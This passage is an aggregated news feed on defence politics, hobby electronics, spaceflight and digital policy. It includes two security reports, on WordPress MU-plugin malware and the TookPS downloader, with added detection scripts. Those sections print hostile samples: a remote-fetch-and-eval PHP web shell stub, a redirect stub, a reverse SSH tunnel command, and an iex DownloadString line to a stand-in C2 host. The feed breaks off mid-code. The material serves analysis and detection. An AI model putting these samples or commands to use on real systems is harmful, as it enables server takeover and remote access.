

Peace in Ukraine and more spending on defence. Rutte's guide

@Notizie dall'Italia e dal mondo

The world is more dangerous, so increasing defence spending is crucial. This premise from NATO Secretary General Mark Rutte sets the tone on the eve of the NATO foreign ministers' meeting, scheduled for 3 and 4 April in Brussels, at a moment monopolised by



NATO rearmament: the challenges, cyber included, for Europe


@Informatica (Italy e non Italy 😁)
According to European Commission President von der Leyen, Europe must invest in defence and strengthen its capabilities, adopting a proactive approach to security. Here are the pillars of the European and NATO rearmament plan
The article NATO rearmament: the challenges, cyber included



70 DIY Synths on One Webpage


If you want to dip your toes into the deep, deep water of synth DIY but don’t know where to start, [Atarity] has just the resource for you. He’s compiled a list of 70 wonderful DIY synth and noise-making projects and put them all in one place. And as connoisseurs of the bleepy-bloopy ourselves, we can vouch for his choices here.

The collection runs the gamut from [Ray Wilson]’s “Music From Outer Space” analog oddities, through faithful recreations like Adafruit’s XOXBOX, and on to more modern synths powered by simple microcontrollers or even entire embedded Linux devices. Alongside the links to the original projects, there is also an estimate of the difficulty level, and a handy demo video for every example we tried out.

Our only self-serving complaint is that it’s a little bit light on the Logic Noise / CMOS-abuse side of synth hacking, but there are tons of other non-traditional noisemakers, sound manglers, and a good dose of musically useful devices here. Pick one, and get to work!


hackaday.com/2025/04/02/70-diy…



#MiStaiACuore, send us your stories and your testimonies!

You can forward the material to comunicazione.istituzionale@istruzione.it and it will be published on social media in the coming weeks.



“After discovering this content, I’m not going to lie… there are times it made me not want to be around any more either,” she said. “I literally felt buried.” #Deepfakes


Is there a connection between those who claim Russia is more prosperous than ever and those who claim Trump is actually strengthening the United States? Are they the same people?


Signalgate: when communications security becomes a boomerang


@Informatica (Italy e non Italy 😁)
The Signalgate case, and the resulting leak of classified US government information, should serve as a system-wide lesson, not only for government institutions but also for the private sector, on the mistakes that can be made in terms




A Y Combinator partner proudly launched an AI recipe app that told people how to make “Actual Cocaine” and a “Uranium Bomb.”#News


Australia’s Steady March Towards Space


The list of countries to achieve their own successful orbital space launch is a short one, almost as small as the exclusive club of states that possess nuclear weapons. The Soviet Union was first off the rank in 1957, with the United States close behind in 1958, and a gaggle of other aerospace-adept states followed in the 1960s, 1970s, and 1980s. Italy, Iran, North Korea and South Korea have all joined the list since the dawn of the new millennium.

Absent from the list stands Australia. The proud island nation has never stood out as a player in the field of space exploration, despite offering ground station assistance to many missions from other nations over the years. However, the country has continued to inch its way to the top of the atmosphere, establishing its own space agency in 2018. Since then, development has continued apace, and the country’s first orbital launch appears to be just around the corner.

Space, Down Under

The Australian Space Agency has played an important role in supporting domestic space projects, like the ELO2 lunar rover (also known as “Roo-ver”). Credit: ASA
The establishment of the Australian Space Agency (ASA) took place relatively recently. The matter was seen to be long overdue from an OECD member country; by 2008, Australia was the only one left without a national space agency since previous state authorities had been disbanded in 1996. This was despite many facilities across the country contributing to international missions, providing critical radio downlink services and even welcoming JAXA’s Hayabusa2 spacecraft back to Earth.

Eventually, a groundswell grew, pressuring the government to put Australia on the right footing to seize growing opportunities in the space arena. Things came to a head in 2018, when the government established ASA to “support the growth and transformation of Australia’s space industry.”

ASA would serve a somewhat different role compared to organizations like NASA (USA) and ESA (Europe). Many space agencies in other nations focus on developing launch vehicles and missions in-house, collaborating with international partners and aerospace companies in turn to do so. For ASA, however, the agency is more focused on supporting and developing the local space industry than on doing the engineering work of getting to space itself.

Orbital Upstarts


Just because the government isn’t building its own rockets, doesn’t mean that Australia isn’t trying to get to orbit. That goal is the diehard mission of Gilmour Space Technologies. The space startup was founded in 2013, and established its rocketry program in 2015, and has been marching towards orbit ever since. As is often the way, the journey has been challenging, but the payoff of genuine space flight is growing ever closer.

Gilmour Space moved fast, launching its first hybrid rocket back in 2016. The successful suborbital launch proved to be a useful demonstration of the company’s efforts to produce a rocket that used 3D-printed fuel. This early milestone helped the company secure investment that would support its push to grander launches at greater scale. The company’s next major launch was planned for 2019, but frustration struck when the larger One Vision rocket suffered a failure just 7 seconds prior to liftoff. Undeterred, the company continued development of a larger rocket, taking on further investment and signing contracts to launch payloads to orbit in the ensuing years.

youtube.com/embed/5vyhef00ebY?…

Gilmour Space has worked hard to develop its hybrid rocket engines in-house.

With orbital launches and commercial payload deliveries the ultimate goal, it wasn’t enough to just develop a rocket. Working with the Australian government, Gilmour Space established the Bowen Orbital Spaceport in early 2024, a launchpad suitable for the scale of its intended space missions. Located near Bowen in North Queensland, it’s just 20 degrees south of the equator, closer than Cape Canaveral, and useful for accessing low- to mid-inclination equatorial orbits. The hope was to gain approval to launch later that year, but thus far, no test flights have taken place. Licensing issues around the launch have meant the company has had to hold back on shooting for orbit.

The rocket with which Gilmour Space intends to get there is called Eris. In Block 1 configuration, it stands 25 meters tall, and is intended to launch payloads up to 300 kg into low-Earth orbits. It’s a three-stage design. It uses four of Gilmour’s Sirius hybrid rocket motors in the first stage, and just one in the second stage. The third stage has a smaller liquid rocket engine of Gilmour’s design, named Phoenix. The rocket was first staged vertically on the launch pad in early 2024, and a later “dress rehearsal” for launch was performed in September, with the rocket fully fueled. However, flight did not take place, as launch permits were still pending from Australia’s Civil Aviation Safety Authority (CASA).

youtube.com/embed/-h8g1CfXopo?…

The Eris rocket was first vertically erected on the launchpad in 2024, but progress towards launch has been slow since then.

After a number of regulatory issues, the company’s first launch of Eris was slated for March 15, 2025. However, that day came and passed, even with CASA approval, as the required approvals were still not available from the Australian Space Agency. Delays have hurt the company’s finances, hampering its ability to raise further funds. As for the rocket itself, hopes for Eris’s performance at this stage remain limited, even if you ask those at Gilmour Space. Earlier this month, founder Adam Gilmour spoke to the Sydney Morning Herald on his expectations for the initial launch. Realistic about the proposition of hitting orbit on the company’s first attempt, he expects it to take several launches to achieve, with some teething problems to come. “It’s very hard to test an orbital rocket without just flying it,” he told the Herald. “We don’t have high expectations we’ll get to orbit… I’d personally be happy to get off the pad.”

Despite the trepidation, Eris stands as Australia’s closest shot at hitting the bigtime outside the atmosphere. Government approvals and technical hurdles will still need to be overcome, with the Australian Space Agency noting that the company still has licence conditions to meet before a full launch is approved. Still, before the year is out, Australia might join that vaunted list of nations that have leapt beyond the ground to circle the Earth from above. It will be a proud day when that comes to pass.


hackaday.com/2025/04/02/austra…



And so we did this one too. Thanks to Orlando Volpe and Roberto Di Lodovico.



Invisible attack on WordPress: attackers are abusing MU-Plugins to hit websites


Sucuri analysts have found that attackers are using the WordPress MU-plugins (Must-Use Plugins) directory to hide malicious code and run it without being detected. The technique was first spotted in February 2025, but its adoption is growing: attackers are currently abusing MU-plugins to deliver three different kinds of malicious code.

These are a special type of WordPress plugin that runs on every page load and does not need to be activated from the admin panel. They are PHP files stored in the wp-content/mu-plugins/ directory that execute automatically when a page loads and do not appear on the Plugins page of the admin panel unless the Must-Use filter is selected. Because they are never activated, they cannot be deactivated from the dashboard either: the only way to stop one is to remove the file from disk.

Such plugins are used, for example, to enforce custom security rules site-wide, improve performance, change variables dynamically, and so on. Because MU-plugins run on every page load and do not show up in the standard plugin list, they can be used to carry out a wide range of malicious activity covertly, including credential theft, injection of malicious code, or modification of the HTML output.

Sucuri's specialists found three payloads that the attackers drop into the MU-plugins directory:

  • redirect.php : redirects visitors (excluding bots and logged-in administrators) to a malicious site (updatesnow[.]net) that shows a fake browser-update prompt to trick the victim into downloading malware;
  • index.php : a web shell that acts as a backdoor, fetching and executing PHP code from a GitHub repository;
  • custom-js-loader.php : loads JavaScript that replaces every image on the site with explicit content and hijacks all external links, opening fraudulent pop-ups instead.



The researchers consider the web shell the most dangerous of these examples, since it lets the attackers run commands remotely on the server, steal data and mount follow-on attacks against the site's users and visitors.

The other two types of malware are more likely to damage a site's reputation and SEO through suspicious redirects and attempts to install malware on visitors' computers.

So far Sucuri's researchers have not been able to determine exactly how the affected sites were infected. The attackers are believed to be exploiting known vulnerabilities in WordPress plugins and themes, or weak administrator credentials. A practical check on any WordPress install is therefore to list every file in wp-content/mu-plugins/ and account for each one, since anything there runs on every request whether or not it appears in the Plugins page.
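As an added illustration (not Sucuri's tooling and not code from the article), the following Python script scans a mu-plugins directory and classifies each PHP file against the three payload families described above. The indicator regexes are assumed heuristics modelled on the article's description, not vendor signatures, and the four sample plugin files it writes to a temporary directory (one legitimate hardening plugin plus constructed stand-ins for redirect.php, index.php and custom-js-loader.php, with placeholder URLs) are constructed here for the demo.

```python
"""Heuristic scan of wp-content/mu-plugins/ for the three payload families
described above. Added illustration, not Sucuri's tooling; the indicator
regexes are assumptions modelled on the article's description, and the
sample plugin bodies are constructed here for the demo."""
import re
import tempfile
from pathlib import Path

# Indicator patterns (assumed heuristics, not vendor signatures).
INDICATORS = {
    # PHP pulling content from a remote URL (the web shell fetches code from GitHub)
    "remote_code_fetch": re.compile(
        r"\b(file_get_contents|curl_exec|fopen)\s*\(.{0,200}?https?://", re.I | re.S),
    # Executing a string as code
    "dynamic_eval": re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
    # Common payload encodings
    "obfuscation": re.compile(
        r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # HTTP redirect issued from PHP
    "location_redirect": re.compile(r"\bheader\s*\(\s*['\"]Location:", re.I),
    # Gating on user agent / login state, as redirect.php does to skip bots and admins
    "visitor_gate": re.compile(r"HTTP_USER_AGENT|is_user_logged_in|current_user_can", re.I),
    # Injecting a script served from an external host (the JS loader)
    "remote_script": re.compile(
        r"(<script[^>]*\bsrc\s*=\s*['\"]|wp_enqueue_script\s*\([^)]*)https?://", re.I),
}


def classify(source: str) -> str:
    """Map one mu-plugin's PHP source to a verdict string."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(source)}
    if "dynamic_eval" in hits and hits & {"remote_code_fetch", "obfuscation"}:
        return "webshell"
    if {"location_redirect", "visitor_gate"} <= hits:
        return "redirect"
    if "remote_script" in hits:
        return "js_loader"
    if hits & {"dynamic_eval", "remote_code_fetch", "obfuscation"}:
        return "suspicious"
    return "clean"


def scan_mu_plugins(mu_dir) -> dict:
    """Return {relative path: verdict} for every .php file under mu_dir.

    WordPress auto-loads only the top-level .php files in mu-plugins; files in
    subdirectories run only if a top-level file includes them, so both are
    scanned and the reported path shows which case applies.
    """
    mu_dir = Path(mu_dir)
    return {p.relative_to(mu_dir).as_posix(): classify(p.read_text(errors="replace"))
            for p in sorted(mu_dir.rglob("*.php"))}


# Constructed sample mu-plugins for the demo (not the real malware; URLs are placeholders).
SAMPLES = {
    "hardening.php": r"""<?php
/* Plugin Name: Site hardening (legitimate mu-plugin) */
add_filter('xmlrpc_enabled', '__return_false');
""",
    "redirect.php": r"""<?php
if (!preg_match('/bot|crawl|spider/i', $_SERVER['HTTP_USER_AGENT'] ?? '') && !is_user_logged_in()) {
    header('Location: https://updatesnow[.]net/', true, 302);
    exit;
}
""",
    "index.php": r"""<?php
$c = @file_get_contents('https://raw.githubusercontent.com/EXAMPLE/EXAMPLE/main/p.txt');
if ($c !== false) { eval($c); }
""",
    "custom-js-loader.php": r"""<?php
add_action('wp_footer', function () {
    echo '<script src="https://cdn.example.invalid/loader.js"></script>';
});
""",
}


def build_sample_dir() -> str:
    """Write the constructed samples into a temp directory and return its path."""
    d = tempfile.mkdtemp(prefix="mu-plugins-")
    for name, body in SAMPLES.items():
        Path(d, name).write_text(body)
    return d


if __name__ == "__main__":
    for name, verdict in scan_mu_plugins(build_sample_dir()).items():
        print(f"{verdict:<10} {name}")
```

Point scan_mu_plugins() at a real wp-content/mu-plugins/ to triage it; a "clean" verdict only means none of these heuristics fired, so every file the site owner cannot account for still deserves a manual read.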

The article Invisible attack on WordPress: attackers are abusing MU-Plugins to hit websites originally appeared on il blog della sicurezza informatica.



let's say that for the United States Trump can be called the "perfect storm". a whole series of measures that, taken together, make the United States more fragile and less effective in every field. a bit like someone who plans for the future actions that will cause devastation and in the meantime also weakens all the structures that would have to be activated in an emergency. I believe that, all things considered, in the long run Trump's effects on Europe may be mostly positive. the same cannot be said for the United States itself. he who is the cause of his own misfortune should weep for himself. US citizens chose a terrible doctor: a conspiracy theorist, anti-vax, anti-everything or almost (he doesn't even know what rare earths are). the US state will in fact cease to exist (except perhaps for the army's weapons). there will be big private corporations that take power directly. that will be the state.


Pirates at the UN Office at Geneva, 2025


Our colleague from the Pirate Party of Switzerland, Carlos Polo, attended the United Nations Economic Commission for Europe (UNECE) Resource Management Week 2025 in Geneva from March 24 to 28. The goal of the event was to discuss sustainable management of energy and mineral resources. Participants explored the adoption of the United Nations Framework Classification for Resources (UNFC) and the United Nations Resource Management System (UNRMS). Numerous experts spoke on ‘just energy transition’, whereby we are converting from fossil fuels to more environmentally friendly energy use. Our representatives very much appreciate going to the events, as well as the side events that can be less formal and provide more opportunities to interact. The main side event was the Geneva Dialogues on Mineral and Metal Resources and the FutuRaM project on forecasting raw material availability. Carlos has been representing us as a volunteer representative for many years in Geneva, and we greatly appreciate his attendance. If you would also like to join our team of UN volunteers, please let us know.


pp-international.net/2025/04/u…



"I will speak for as long as I am physically able."
US: record-breaking speech by Democratic senator Cory Booker lasts more than 24 hours | Euronews it.euronews.com/2025/04/02/usa…



A game plan for middle powers



HELO, GWLEIDYDDIAETH DDIGIDOL YW HYN. For those who don't speak Welsh (like me), that's "Hello, this is Digital Politics." I'm Mark Scott, and this edition comes to you from an unseasonably warm (well, for the United Kingdom) Welsh coastal village. Normal transmission will resume next week.

— The digital world is increasingly divided between Great Powers. That has left a lot of room for so-called 'middle powers' to exert outsized influence.

— The world of trust and safety is wading through treacherous political waters that will leave many caught between rival national governments.

— Ahead of pending US tariffs to be announced on April 2, it's worth remembering global digital exports have doubled over the last 10 years.

Let's get started.


How to make your mark in digital policymaking


THE UNITED STATES. CHINA. THE EUROPEAN UNION. When it comes to digital, those three make up the trifecta of global powers — for different reasons. The US is home to the world's biggest and most vibrant tech sector — but with few checks for citizens. China's authoritarian control of the internet has fast-tracked new services (and repression) like no other. The EU's world-leading digital regulation offers a third way between outright capitalism and state rule — with a lack of homegrown tech.

Yet in the Digital Great Game that has engulfed this year, let's take a minute to think about middle powers. Those are the countries like Japan, the UK and Brazil that have sizable domestic markets, exert regional clout due to their size or national expertise, and often chart a different path on tech that may be more useful to others caught between the vying interests of China, the US and the EU.

It's unrealistic that, say, a Philippines (despite its 100m+ population) is ever going to sit side-by-side next to China to export its own vision of digital across Asia. Ditto goes for Argentina in Latin America. Wouldn't it be better to learn lessons from such middle powers that have created their own way (often with mixed reasons) rather than falling into one of the camps led by the world's three largest digital powers?

If you want to know what that looks like, spend some time in Tokyo. Yes, the world's fourth-largest global economy isn't a slouch when it comes to economic prowess. But its aging population, limited linguistic prowess (sorry to all my Japanese-speaking readers!) and positioning close to China have forced Japan to take some bold swings on digital policymaking that are worth a second look.


**A message from Microsoft** Each day, millions of people use generative AI. Abusive AI-generated content, however, can present risks to vulnerable groups such as women, children, and older adults. In a new white paper, developed in consultation with civil society, we present actionable policy recommendations to promote a safer digital environment.


The country's recently-announced AI proposals (overview here) are anything but a copy-paste of the EU's AI Act — unlike, ahem, what South Korea tabled. Some may not think Tokyo has gone far enough by only requiring AI companies to cooperate with government AI efforts. But the title of the legislation — "Bill on the Promotion of Research, Development and Utilization of Artificial Intelligence-Related Technologies" — makes clear the proposed rules are more about enabling the emerging technology within the economy, and not about curtailing its use due to concerns AI will undermine society.

The proposals also require Japan to align with "international standards." What those AI standards will be is currently unclear. But it's a hat tip to the wider global (read: Western) policymaking conversation around AI where Japan has continued to punch above its weight. That goes for everything from Tokyo's work around the so-called Hiroshima Process on generative AI to its closed-door leadership via the Organization for Economic Cooperation and Development on global data governance standards (crucial for the ongoing sharing of data internationally).

There are a couple of lessons from Japan's digital policymaking that apply to other countries seeking to make their mark.

First, don't try to do everything at once. Tokyo doesn't want to convince everyone to follow its lead. Instead, it often takes a pragmatic view on a small number of issues where it believes it can make a difference and that will benefit its local businesses/citizens.

Second, a willingness to play host to the bigger powers, which is what Japan did with the Hiroshima Process, can buy you international political capital, on both digital and non-digital issues, that you can tap into further down the line. Recognizing where a country can add value — as a convener, for instance — allows local officials to navigate the inherent difficulties when trying to balance the interests of the Great Digital Powers.

Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.

Here's what paid subscribers read in March:
— Claims that online safety rules are censorship have gone global; Europe's digital rules are not seen to help its citizens; Global data flows are not slowing down. More here.
— A readout on Trump 2.0's approach to digital policy; Why Canada worries about US interference in its election; A debrief on the EU's AI 'gigafactories.' More here.
— Four ways that social media can be made more transparent and accountable via supporting how outsiders access platform data. More here.
— Why we need to come up with a better version of 'tech sovereignty;' Apple's antitrust loss in Brussels is good for (most) Big Tech; AI models' lack of regional diversity. More here.

That's where middle powers can truly come into their own. By outlining a nimble digital policy agenda that centers on a small number of targeted objectives — versus trying to boil the ocean with an overly-complex and broad agenda — countries beyond the EU, China and the US can find niche tech issues that benefit their local constituencies.

That's the positive view. Now for the negative: the UK.

I've already expressed my reservations about London's quixotic approach to digital policy. In short: the only thing that matters, really, is boosting foreign direct investment into the country's region-leading tech sector. And, to be clear, there's nothing wrong with that.

But that hasn't stopped British politicians and policymakers from trying to bite off more than they can chew on everything from online safety to artificial intelligence to digital competition. In recent years, the UK has swung for the fences on all three of those areas, promoting itself as a world-leading center of digital regulation and tech-related industry. You can have the Online Safety Act AND be home to scores of global platform workers. You can pass sophisticated digital antitrust rules AND support the acquisition of local startups by Big Tech giants.

Frankly, I just don't buy it. Unlike Japan, the UK tries to play in the same realm as the US, China and the EU, but doesn't have the economic firepower or the regulatory muscle to do that well. Instead, London finds itself in the worst of all worlds. A middle power (with a lot of strong attributes upon which to call) that is too small to play in the Big Leagues but is unable — or unwilling? — to relegate itself to the second tier where it could really make a difference.

That should be a warning to other countries seeking to find their own path on digital policymaking. Don't pretend you can go head-to-head with global powers when you'll only end up on the worse side of that encounter.

More importantly — and this is especially true for London and its longstanding desire to remain in lockstep with the US — don't change your own digital agenda to fit into the ever-changing policies of longstanding allies.

London's last-minute decision not to sign the communiqué at the recent Paris AI Action Summit, because the US had decided not to, hurt the country's global reputation without much upside gained with Washington. The UK's "will they, or won't they" approach to pulling back on existing digital regulation equally has not positioned the Brits as a safe pair of hands in the ever more complex world of global tech policy.

In short, when it comes to navigating a country's own path on digital policy, be more like Japan, and less like the UK.


Chart of the Week


DONALD TRUMP'S ADMINISTRATION WILL UNVEIL a cavalcade of global tariffs on April 2 which some in the White House are calling "Liberation Day."

Thankfully, much of the digital world has escaped these threats as negotiations via the World Trade Organization mostly exempted so-called "electronic transmissions" (read: online purchases) from such duties.

It's a good thing, too. At least for global trade. Over the last decade, trade via so-called "digitally-delivered services" has roughly doubled, based on global exports (see left chart) and imports (see right chart.)

[Charts: global exports (left) and imports (right) of digitally-delivered services over the last decade]

Source: World Trade Organization


Geopolitics is coming for Trust & Safety Inc


LAST WEEK WAS THE SECOND INSTALLMENT of my (London-based) tech policy meet-up series known as "Marked as Urgent." I run it alongside Ben Whitelaw (and his Everything in Moderation newsletter) and Georgia Iacovou (and her Horrific/Terrific newsletter.) Photos here, and let me know if you're down for us bringing the roadshow to your city. We're game.

The topic of the night was: "What next for Trust & Safety?" Disclaimer: I can be a little like a one-trick pony. But I spoke about how the world of (international) politics is almost certainly going to hit the T&S industry like a ton of bricks in the coming months. I'm not sure many in the sector either know or are prepared for what is coming down the pike.

Let's walk through this.

First, there is a growing divide, in the democratic world, between the US and everyone else. No, I'm not talking about Washington's overall shift in policy. Instead, the likes of Australia, Canada and South Korea are quickly moving to impose rules on online platforms to moderate illegal speech — and force companies to explain exactly how they are doing that.

In the US, Trump's position on any form of content moderation — that it is a form of illegal censorship — is well known. It's now getting implemented via Congressional hearings, White House directives and efforts by US federal agencies. That comes despite a growing sophistication in the US-based trust and safety sector that remains arguably the largest, globally, despite the recent shift in political winds.

Second, this split between the US and everyone else on content moderation will force companies to pick sides. Some will do it happily (looking at you, Meta.) Others will shift gears out of either regulatory necessity or political calculation to keep them on the right side of specific world leaders. Yet there will be inherent conflicts when rank-and-file trust and safety experts continue the daily work of complying with national online safety rules, while companies' top executives make public statements about why they believe such work should be stopped.


**A message from Microsoft** New technologies like AI supercharge creativity, business, and more. At the same time, we must take steps to ensure AI is resistant to abuse. Our latest white paper, "Protecting the Public from Abusive AI-Generated Content across the EU," highlights the weaponization of women’s nonconsensual imagery, AI-powered scams and financial fraud targeting older adults, and the proliferation of synthetic child sexual abuse.

The paper outlines steps Microsoft is taking to combat these risks and provides recommendations as to how the EU's existing regulatory framework can be used to combat the abuse of AI-generated content by bad actors. We thank Women Political Leaders, the MenABLE project, the Internet Watch Foundation, the WeProtect Global Alliance, and the European Senior’s Union for their important work and support. Click here to read more.


I don't envy those inside the platforms who will be stuck between those public statements and the day-to-day requirements of regulatory compliance.

Yet for those outside of the US, don't expect the political world to leave you alone, either.

Now that we are a couple of years into mandatory online safety regimes (well, almost a decade if you're in Australia), there are few lawmakers who are making the case, publicly, about why such rules are good for voters. Sure, national leaders make statements about online kids safety, digital terrorism or (Russian) foreign interference whenever a big news event happens. But there's no elected official really explaining to people why trust and safety is crucial to both creating a more inclusive online environment and (important for any politician) why it's in the country's national interest.


That's a problem. It's a problem because, at some point, the White House is likely to impose retaliatory tariffs on a country that announces some form of fine and/or remedy on an American social media giant. The Trump 2.0 administration specifically called out the UK and EU online safety regimes for undermining freedom of speech. At this point, we should take Washington at its word about taking such future action.

If/when those tariffs start, which politician in those targeted countries is going to stand up for these regimes? Which leader will be willing to go to the mattresses to defend a national online safety regime so that it doesn't become a bargaining chip in wider trade negotiations with the US?

Currently, I don't see clear support from non-US politicians on those points. It should concern anyone working in the trust and safety industry that there is no mainstream political buy-in for the work that they do. Especially, as stated above, when there's also growing internal apathy in many of these companies for that work, too.

In the coming months, I'm still unclear how this will play out. Both inside social media giants and within countries' political establishments. But what I do know is that all forms of platform governance will become increasingly intertwined with geopolitics in the months ahead.

Thanks for getting this far. If you're interested in sponsoring future editions of Digital Politics, please get in touch on digitalpolitics@protonmail.com


What I'm reading


— The European Commission announced $1.4 billion in financial support for artificial intelligence, cybersecurity and digital skills across the 27-country bloc. More here.

— The Carnegie Endowment for International Peace goes deep into how decentralized versions of social media platforms represent a new way to govern online spaces. More here.

— The US Office of the Director of National Intelligence published its annual threat assessment, including areas associated with tech. More here.

— Researchers from the University of Münster in Germany delved into how TikTok audio clips were used in disinformation campaigns related to the war in Ukraine. More here.

— British regulators explained why they believed the country's existing rules would foster the development of next-generation AI models. More here.

— The International Association of Privacy Professionals and Harvard's Berkman Klein Center for Internet & Society are organizing a two-day retreat for digital policy leaders in June. They've just opened up registrations here.


digitalpolitics.co/newsletter0…



The new issue of Magda is online. It is the newsletter of Centrum Report, a companion project to the Václav podcast with a more cultural slant. In it you will find suggestions on books, films, exhibitions and much more.

It is also where we collect our contributions to the press and other media, our work and our longform pieces. When particularly significant events occur we give you some updates, which are then developed and expanded on Václav.

This month, for example, we discuss the Polish law suspending the right to asylum, and the Hungarian one banning the public organisation of Pride.

You can read the newsletter via the link below. Our suggestion is to subscribe for free so that you receive it in your inbox.

Happy reading!

@centroesteuropa@feddit.it

magdacentrumreport.substack.co…



The Lowly Wall Wart Laid Bare


Getting a look at the internals of a garden variety “wall wart” isn’t the sort of thing that’s likely to excite the average Hackaday reader. You’ve probably cracked one open yourself, and even if you haven’t, you’ve likely got a pretty good idea of what’s inside that sealed up brick of plastic. But sometimes a teardown can be just as much about the journey as it is the end result.

Truth be told, we’re not 100% sure if this teardown from [Brian Dipert] over at EDN was meant as an April Fool’s joke or not. Certainly it was posted on the right day, but the style is close enough to some of his previous work that it’s hard to say. In any event, he’s created a visual feast — never in history has an AC/DC adapter been photographed so completely and tastefully.
An Ode to the Diode
[Brian] even goes so far as to include images of the 2.5 lb sledgehammer and paint scraper that he uses to brutally break open the ultrasonic-welded enclosure. The dichotomy between the thoughtful imagery and the savage way [Brian] breaks the device open only adds to the surreal nature of the piece. Truly, the whole thing seems like it should be part of some avant garde installation in SoHo.

After he’s presented more than 20 images of the exterior of the broken wall wart, [Brian] finally gets to looking at the internals. There’s really not much to look at, there’s a few circuit diagrams and an explanation of the theory behind these unregulated power supplies, and then the write-up comes to a close as abruptly as it started.

So does it raise the simple teardown to an art form? We’re not sure, but we know that we’ll never look at a power adapter in quite the same way again.


hackaday.com/2025/04/02/the-lo…



Uto Ughi per i Giovani: on #3aprile, from 11 a.m., the project will be presented at the Papal Basilica of Saint Francis in Assisi.



Protecting children's rights in Palestine. Strengthening international accountability.


@Notizie dall'Italia e dal mondo
The video of the side event at the 58th session of the United Nations Human Rights Council, organised by Defence for Children International and broadcast in collaboration with Pagine Esteri.
The article Proteggere i diritti



In the coming days, dismissal letters may reach the 121 workers of the former GKN plant. 31 March was the last day of the redundancy procedure, and the company refused to extend it pending publication of the composition plan on which a plan to safeguard jobs could have been built.
Once again the company QF has shown itself unwilling to safeguard jobs and deaf to proposals to reindustrialise the site. This is made even more serious by the violation of the rules against relocation, whose application GKN and FIOM have requested.
The most important Italian workers' struggle, which even managed to put forward plans to reindustrialise the site and to raise more than one million euros to be injected into the share capital of the Cooperative that would carry out these new activities, risks coming to an end.
As Giovani Comunisti/e we have stood alongside this struggle from day one, and alongside the workers who have carried it forward for almost 4 long years. We believe the MIMIT must intervene to safeguard jobs and the possibility of continuing production at that site, through the GKN Cooperative, no longer under a bosses' logic but one of cooperation and mutual aid.

Paolo Bertolozzi, national coordinator of Giovani Comunisti/e
Auro Bizzoni, national labour officer of Giovani Comunisti/e



TookPS: DeepSeek isn’t the only game in town


In early March, we published a study detailing several malicious campaigns that exploited the popular DeepSeek LLM as a lure. Subsequent telemetry analysis indicated that the TookPS downloader, a malware strain detailed in the article, was not limited to mimicking neural networks. We identified fraudulent websites that mimic official sources for remote desktop and 3D modeling software, alongside pages offering these applications as free downloads.

Malicious websites

UltraViewer, AutoCAD, and SketchUp are common business tools. Therefore, potential victims of this campaign include both individual users and organizations.

Our telemetry also detected file names such as “Ableton.exe” and “QuickenApp.exe”, alongside malicious websites. Ableton is music production software for composition, recording, mixing, and mastering, and Quicken is a personal finance app for tracking expenses, income, debts, and investments across various accounts.

TookPS


In our report on attacks exploiting DeepSeek as a lure, we outlined the infection chain initiated by Trojan-Downloader.Win32.TookPS. Let us delve into this. Upon infiltrating a victim’s device, the downloader reaches out to its C2 server, whose domain is embedded in its code, to retrieve a PowerShell script. Different malware samples communicate with different domains. For example, the file with the MD5 hash 2AEF18C97265D00358D6A778B9470960 reached out to bsrecov4[.]digital, which was inactive at the time of our research. It received the following base64-encoded command from that domain:

Original command

Decoding reveals the PowerShell command being executed:

The variable “$TookEnc” stores an additional base64-encoded data block, also executed in PowerShell. Decoding this reveals the following command:

Decoded command from $TookEnc variable shown in the previous screenshot

Example of decrypting another command from $TookEnc variable

Although different samples contain different URLs, the command structure remains identical. These commands sequentially download and execute three PowerShell scripts from the specified URL. The first script downloads “sshd.exe”, its configuration file (“config”), and an RSA key file from the C2 server. The second script retrieves command-line parameters for “sshd” (remote server address, port, and username), and then runs “sshd”.

Example of a malicious PowerShell command generated by the PowerShell script:
ssh.exe -N -R 41431:localhost:109 Rc7DexAU73l@$ip_address -i "$user\.ssh\Rc7DexAU73l.41431" -f "$user\.ssh\config"
This command starts an SSH server, thereby establishing a tunnel between the infected device and the remote server. For authentication, it uses the RSA key downloaded earlier, and the server configuration is sourced from the “config” file. Through this tunnel, the attacker gains full system access, allowing for arbitrary command execution.
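A defender-side decoder for command lines of the kind described above, added here as an example that is not part of the Securelist write-up: it peels nested base64 layers (UTF-8, and the UTF-16LE form that PowerShell's -EncodedCommand uses) out of a captured process command line, extracts URLs and flags download-and-execute and reverse SSH tunnel patterns. The two sample command lines, the host c2.example.invalid and the address 198.51.100.7 are constructed for the demo and are not campaign indicators.

```python
import base64
import re

# Behaviours derived from the write-up: staged download-and-execute, a reverse SSH
# tunnel (-R) and an RSA key dropped under the user's .ssh folder.
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
RULES = {
    "download-and-execute": re.compile(
        r"(\biex\b|Invoke-Expression|DownloadString|Invoke-WebRequest|FromBase64String)", re.I),
    "reverse-ssh-tunnel": re.compile(r"\bsshd?(?:\.exe)?\b.*\s-R\s+\d+:", re.I),
    "ssh-key-in-user-profile": re.compile(r"\\\.ssh\\", re.I),
}


def _to_text(raw: bytes):
    """Return raw bytes as printable ASCII (UTF-8 first, then UTF-16LE), else None."""
    for enc in ("utf-8", "utf-16-le"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if text and all(32 <= ord(c) < 127 or c in "\r\n\t" for c in text):
            return text
    return None


def decode_layers(cmdline: str, max_depth: int = 5) -> list:
    """Peel nested base64 blobs out of a command line, breadth-first, up to max_depth layers."""
    layers, frontier = [cmdline], [cmdline]
    for _ in range(max_depth):
        found = []
        for text in frontier:
            for blob in B64_RE.findall(text):
                try:
                    decoded = _to_text(base64.b64decode(blob, validate=True))
                except ValueError:  # binascii.Error: bad padding or non-base64 token
                    continue
                if decoded:
                    found.append(decoded)
        if not found:
            break
        layers.extend(found)
        frontier = found
    return layers


def analyze(cmdline: str) -> dict:
    """Decode every layer, then report the URLs and the behaviours matched across all of them."""
    layers = decode_layers(cmdline)
    urls, hits = set(), set()
    for text in layers:
        urls.update(URL_RE.findall(text))
        hits.update(name for name, rx in RULES.items() if rx.search(text))
    return {"layers": len(layers), "urls": sorted(urls), "findings": sorted(hits)}


# Constructed samples (not from the real campaign) mirroring the two stages described above.
_INNER = "iex (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/s1.ps1')"
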